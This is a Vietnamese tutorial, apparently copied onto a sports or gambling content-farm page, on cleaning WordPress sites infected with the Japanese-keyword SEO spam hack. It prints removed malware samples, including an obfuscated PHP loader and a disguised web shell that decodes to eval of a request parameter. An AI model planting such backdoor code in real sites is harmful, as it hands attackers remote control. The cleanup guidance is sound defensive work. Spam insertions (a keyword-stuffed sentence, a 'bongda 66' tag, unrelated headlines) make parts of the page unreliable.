时间:2025-01-28 08:10:31 来源:网络整理编辑:Cúp C2
Tin thể thao 24H Cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật_bongda 66
Mình biết phải tốn rất nhiều thời gian và công sức để SEO các từ khóa lên Top. Tuy nhiên,áchfixlỗisitebịnhiễmmãđộcvàindextiếngNhậbongda 66 khi các website khi không may bị dính mã độc sẽ khiến công sức các bạn gầy dựng bao lâu có thể tan thành mây khói chỉ trong vài ngày.
Bài viết sau đây sẽ hướng dẫn các bạn cách chi tiết cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật. Mình sẽ không đi sâu vào lý do việc website bị hack.
Các website dùng WordPress thường là đối tượng bị dính mã độc khá nặng, khiến cho website tự động index link tiếng Nhật lên kết quả tìm kiếm Google, điển hình như sau:
Website bị nhiễm mã độc và index link tiếng Nhật sử dụng liên kết đến các cửa hàng bán hàng giả mạo và sau đó được hiển thị trong tìm kiếm của Google (Có thể kiểm tra những đường link này theo dạng site:domain). Với loại hack này, hacker thường sẽ tự thêm mình làm chủ sở hữu tài sản trong Google Webmaster Tool (WMT). Vì thế, bước đầu tiên bạn phải xóa quyền sở hữu của tài khoản lạ trong WMT
- Vào đường link sau https://www.google.com/webmasters/verification
- Vào "Chi tiết xác minh" để xem cách "tài khoản lạ" xác minh sở hữu website.
- Sau đó, vào CMS để xóa quyền sở hữu website này. (Trước khi bắt đầu, tạo một bản sao của bất kỳ tệp nào trước khi bạn xóa chúng, trong trường hợp bạn cần khôi phục chúng sau)
+ Mã thông báo xác minh cần xóa thường là tệp HTML trên thư mục gốc của trang web trên CMS.
+ Bạn thường có thể kiểm tra xem đã xoá thành công mã thông báo xác minh được tạo ra bằng cách điều hướng đến tệp token xác minh mô phỏng như thế nào www.example.com/google[random number and letters].html
Ví dụ: Website của mình có một mã xác minh: google-site-verification: google0003f30bc19bd379.html. Trên thanh URL gõ đường dẫn Domain/google0003f30bc19bd379.html. Nếu kết quả là 404 thì bạn đã xóa thành công tài khoản này
- Đi kèm với xác minh chủ sở hữu bằng tệp token, hacker cũng chèn vào một file Sitemapchứa các link độc hại để website index các link này nhanh hơn. Bạn cũng cần xóa file này đi
Đây là cách rất nhanh để xác định các tập tin được hacker rải mã độc vào CMS. Đây là một plug-in về bảo mật miễn phí của WordPress . Sử dụng chức năng "scan" để quét các file. Sau đấy bạn dựa vào đó để sửa từng thư mục. Update các theme, phiên bản WordPress .
Quét qua các tệp tin đáng ngờ mà bạn đã xác định để tìm các khối mã obfuscated. Mã obfuscated như một sự kết hợp của các chữ cái và chữ số sắp xếp lộn xộn thường được đặt trước bởi sự kết hợp của các hàm PHP như:
base64_decode, rot13, eval, strrev, gzinflate
Một số cấu trúc mình đã xóa:
<>
@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = 'mapss259.xml';
$jdir = '';
$smuri_tmp = smrequest_uri();
if($smuri_tmp==''){
$smuri_tmp='/';
}
$smuri = base64_encode($smuri_tmp);
$dt = 0;
function smrequest_uri(){
if (isset($_SERVER['REQUEST_URI'])){
$smuri = $_SERVER['REQUEST_URI'];
}else{
if(isset($_SERVER['argv'])){
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0];
}else{
$smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];
}
}
return $smuri;
}
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5....");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O....
?>
<>
/**
* @package wordpresss
* @subpackage Template.system
*
* @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
$p = getcwd();
echo $p;
?>
<>
$uf="aXRvbmd0b";
$ka="ZXZhbCgkX1";
$pjt="JFUVVFU1Rb";
$vbl = str_replace("ti","","tistittirti_rtietipltiatice");
$iqw="25nXSk7";
$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke");
$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn");
$mpy = $sbp('', $bkf($vbl("W", "", $ka.$pjt.$uf.$iqw))); $mpy();
?>
Decode đoạn trên ra kết quả
Top xe sedan giá rẻ tháng 1/2023: Accent vững ngôi đầu, Vios bất ngờ tụt sâu2025-01-28 08:24
90% người dùng muốn màn hình smartphone to hơn2025-01-28 08:18
Kodak ngừng sản xuất máy ảnh kỹ thuật số2025-01-28 07:45
Máy ảnh “chụp trước, lấy nét sau” Lytro lên kệ2025-01-28 07:27
Chuyện ly kỳ về ma2025-01-28 07:17
Kogeto Dot2025-01-28 06:40
Lenovo ra mắt bộ đôi PC dòng ThinkCentre Edge2025-01-28 06:28
Truyện [Mạt Thế] Hệ Thống Sống Còn2025-01-28 06:27
'Thưa thầy, phim tài liệu là loại phim không ai xem'2025-01-28 06:10
Người dùng thờ ơ với Google TV2025-01-28 05:47
Xao xuyến nét đẹp trong sáng của cô gái dân tộc Giáy2025-01-28 08:30
Bộ sưu tập những chiếc USB... quái dị2025-01-28 08:22
Truyện Trúc Mộc Lang Mã2025-01-28 08:16
10 game Android miễn phí hot nhất hiện nay2025-01-28 07:56
Chồng mang bằng khen đến chúc mừng vợ sinh con gái2025-01-28 07:21
8 “địch thủ” của Apple iPad 32025-01-28 07:09
Không nên mua smartphone Android giá rẻ?2025-01-28 06:43
Truyện Hợp Đồng Bé Đường2025-01-28 06:33
TP.HCM: Kênh Tàu Hủ ngập rác thải, nước đen kịt, bốc mùi hôi thối2025-01-28 06:25
LG Prada 3.0 chính thức ra mắt tại Việt Nam2025-01-28 06:22